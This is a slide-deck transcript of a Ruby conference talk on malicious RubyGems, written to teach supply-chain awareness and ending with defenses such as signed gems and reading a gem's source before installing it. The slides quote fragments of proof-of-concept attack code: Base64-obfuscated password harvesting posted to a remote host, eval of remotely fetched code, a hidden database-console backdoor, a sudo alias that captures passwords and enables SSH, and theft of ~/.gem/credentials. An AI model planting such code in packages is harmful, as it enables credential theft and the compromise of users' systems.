Hacking with Gems (Ancient City Ruby)

Hacking with Gems
Benjamin Smith
@benjamin_smith

View Slide

How-to get rich quick and
(maybe)
not go to jail!

View Slide

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems.
He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems.
This offer may not be combined with any other offers.
Ben Smith’s gems were processed in a location that also processes peanuts.
Not valid in the state of Nevada.
Ben Smith’s gems may contain substances known in the state of California to cause cancer.

View Slide

who i am

View Slide

View Slide

what i am NOT

View Slide

View Slide

please do not try this at home

View Slide

how it all started
GEM
remote: https://rubygems.org/
specs:
actionmailer (3.2.12)
actionpack (= 3.2.12)
mail (~> 2.4.4)
actionpack (3.2.12)
activemodel (= 3.2.12)
activesupport (= 3.2.12)
builder (~> 3.0.0)
erubis (~> 2.7.0)
...

View Slide

what’s the worst that could happen?

View Slide

View Slide

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

View Slide

before...

View Slide

after!

View Slide

some “side effects”
if params.to_s.match(Base64.decode64('cGF...'))

View Slide

...
File.open(
"#{Rails.root}/public/development.log",
'a+'
) do |f|
f.write("#{params.inspect}\n")
end

View Slide

?!?
Net::HTTP.post_form(
URI.parse(Base64.decode64('aHR0cDo...')),
{
'log'=>params.merge(:url =>
request.url).inspect
}
)

View Slide

i like cGFzc3dvcmQ=\n
if params.to_s.match(Base64.decode64('cGF...'))

View Slide

i like password
if params.to_s.match(“password”)

View Slide

“development.log”
...
"user"=>{"email"=>"[email protected]",
"password"=>"password",
"remember_me"=>"0"}
...

View Slide

elsewhere...

View Slide

proﬁt
• Step 1: do something
• Step 2: do something else
• Step 3: ????
• Step 4: proﬁt

View Slide

proﬁt
• Step 1: write a gem that does something
• Step 2:
• Step 3:
• Step 4:

View Slide

proﬁt
• Step 2: add code to harvest emails/pws
• Step 3:
• Step 4:

View Slide

proﬁt
• Step 3: use emails/pws on banking websites
to transfer funds
• Step 4:

View Slide

proﬁt
to transfer funds
• Step 4: proﬁt

View Slide

profit
to transfer funds
• Step 4: profit
• Step 5: flee the country

View Slide

a one way ticket to

View Slide

that was easy.
what else can I do?

View Slide

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector

View Slide

show me the hack
#stark-samurai-8122.herokuapp.com/logs>,
{"log"=>"{\"utf8\"=>\"✓\",
\"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\",
\"user\"=>{\"email\"=>\"test\",
\"password\"=>\"pass4\"
...

View Slide

how it works
def HTTP.valid_post_form(url, params)
...
def HTTP.post_form(url, params)
self.smart_log(
"Net::HTTP.post_form(#{url.inspect},
#{params.inspect})"
)
Net::HTTP.valid_post_form(url, params)
end

View Slide

...and one more thing...
eval(Net::HTTP.valid_get(
URI("http://....herokuapp.com/
snippets/6")
)
)

View Slide

database what?
append_before_filter :net_http_detector
...
if params[:db_console]
@tables =ActiveRecord::Base.connection.tables
if params[:query]
@output = ActiveRecord::Base.connection
.execute(params[:query])

View Slide

/users/sign_in

View Slide

/users/sign_in?db_console=t

View Slide

hello db access!

View Slide

SELECT * FROM users;

View Slide

UPDATE users SET admin=1
WHERE id=42;

View Slide

CREATE USER admin1 WITH
PASSWORD 'password';

View Slide

careful of wolves in sheep’s clothing

View Slide

proﬁt
• Step 1:
• Step 2:
• Step 3:
• Step 4:
• Step 5:

View Slide

proﬁt
• Step 2:
• Step 3:
• Step 4:
• Step 5:

View Slide

proﬁt
• Step 2: add code to provide DB access
• Step 3:
• Step 4:
• Step 5:

View Slide

proﬁt
• Step 3: use personal info to apply for a boat
loan (ie buy a pimp trimaran)
• Step 4:
• Step 5:

View Slide

proﬁt
• Step 4: proﬁt
• Step 5:

View Slide

proﬁt
• Step 4: proﬁt

View Slide

i like the beach

View Slide

that was easy.
what else can I do?

View Slide

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s

View Slide

what it claims to do
Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"
... instead of...
=> " 1 Jan"

View Slide

View Slide

what it also does
set_date_formats_for(
Rails.env,
Rails.root.to_s
)

View Slide

better_date_to_s.bundle
œ˙Ì˛ê(__TEXT__text__TEXTP
ÛP
Ä__stubs__TEXTD
$DÄ__stub_helper__TEXThLhÄ__cstring__TEX
T∏i∏__unwind_info__TEXT!P!
__eh_frame__TEXTxÄxà__DATA__nl_symbol_pt
r__DATA__got__DATA__la_symbol_ptr__DATA0
__data__DATAHHH__LINKEDIT ‰"Ä0 8@
Ä¿ `(!‰"

View Slide

behind the curtain
if(strcmp(rails_env, "production") == 0) {
sprintf(tar_command, "tar -zcvf
%s/public/assets.tar.gz %s > /dev/
null 2>&1",rails_root,rails_root);
system(tar_command);
}

View Slide

what what

View Slide

i can haz source

View Slide

truth time
• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile

View Slide

so much code so little time
• Step 2: add code expose source
• Step 3: sell to competitors?
• Step 4: proﬁt?

View Slide

that was easy hard.
what else can I do?
(that's easier)

View Slide

gem install be_truthy
github.com/benjaminleesmith/be_truthy

View Slide

what it does
> true.should be_true
> User.new.should be_true
> User.new.should be_truthy

View Slide

what it ACTUALLY does

View Slide


View Slide

ﬁle tree looks ok

View Slide

source code looks good
require "be_truthy/version"
module BeTruthy
end

View Slide

but what was this?

View Slide

I see no C

View Slide

run the what ﬁle?
Gem::Specification.new do |gem|
...
gem.extensions = ["Rakefile"]
...
end

View Slide

there is no Rakeﬁle

View Slide

the real ﬁle tree

View Slide

what does the Rakeﬁle do?

View Slide

sudo_file =__FILE__.gsub(
'Rakefile', 'lib/tmp.rb'
)
FileUtils.mv(
sudo_file,
"#{home_dir}/.tmp"
)

View Slide

File.open(profile, 'a+') do |f|
f.write("alias sudo='ruby #{home}/.tmp'\n")
end

View Slide

FileUtils.rm(__FILE__)

View Slide

what does "sudo" do now?

View Slide

print "WARNING: Improper use of the sudo
command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

View Slide

echo '#{password}' | /usr/bin/sudo -S
systemsetup -setremotelogin on

View Slide

/usr/bin/sudo dscl . -create /Users/
#{username}
...
/usr/bin/sudo dscl . -passwd /Users/
#{username} password`

View Slide

URI.parse('http://.../logs'),
{'log' => 'ssh enabled'}
)

View Slide

ssh sysadmin@your-ip

View Slide

take away:
don't install ben's gems

View Slide

View Slide

how could I get you
to install my gems?

View Slide

what gems are
trustworthy?

View Slide

how can I add my code
to already trusted gems?

View Slide

back in the be_truthy gem
gem_api_key = File.open(
`echo ~/.gem/credentials`.strip
).read
gem_list = `gem list`
Net::HTTP.post_form(...)

View Slide

gem_api_key = File.open(
`echo ~/.gem/credentials`.strip
).read
gem_list = `gem list`
Net::HTTP.post_form(...)
back in the be_truthy gem

View Slide

now I own your gems

View Slide

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem

View Slide

do people trust your gems?

View Slide

do people who install
your gems have
trustworthy gems?

View Slide

View Slide

there’s still one problem

View Slide

bootstrapping

View Slide

being popular sucks

View Slide

conferences

View Slide

webmock

View Slide

rspec-given

View Slide

quacky

View Slide

social engineering

View Slide

View Slide

• matt
• smoe
• bttf
• james
• tlittle
• rbabcock
• nusco
• ixil
• Stuart
• eileen
• jay
• Michael
• christopher.mcnabb

View Slide

so what happens now?

View Slide

ruby gems goes down

View Slide

heroku deploys go down

View Slide

i go to the beach

View Slide

ruby gems goes down

View Slide

heroku deploys go down

View Slide

recovery

View Slide

so what now?

View Slide

gem 'awesome_rails_flash_messages'

View Slide

Little Snitch
obdev.at/products/littlesnitch/index.html

View Slide

gem install be_truthy

View Slide

fseventer
fernlightning.com/doku.php?id=software:fseventer:start

View Slide

don’t “gem install” from
strangers

View Slide

gem fetch vs gem install
> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem

View Slide

View Slide

curl -#L https://get.rvm.io | bash -s stable
--autolibs=3 --ruby

View Slide

gem install rails -P HighSecurity

View Slide

> gem install rails -P HighSecurity
Fetching: activesupport-3.2.12.gem (100%)
ERROR: While executing gem ...
(Gem::Exception)
Unsigned gem

View Slide

gem cert --build

View Slide

https://www.rubygems-openpgp-ca.org/
https://github.com/rubygems-trust

View Slide

sandboxing

View Slide

github.com/rubygems/rubygems

View Slide

tools to detect
malicious code

View Slide

private gem repos

View Slide

do not try this at home

View Slide

don't install gems you
don't need to

View Slide

pay attention to what
your gems do

View Slide

monitor your system

View Slide

read the source

View Slide

gem install coal-mine-canary
github.com/benjaminleesmith/coal-mine-canary

View Slide

on install

View Slide

the results

View Slide

thank you!

View Slide

questions? ideas?
@benjamin_smith
https://github.com/benjaminleesmith

View Slide

Hacking with Gems (Ancient City Ruby)

Hacking with Gems (Ancient City Ruby)

Benjamin Smith

More Decks by Benjamin Smith

Other Decks in Technology

Featured

Transcript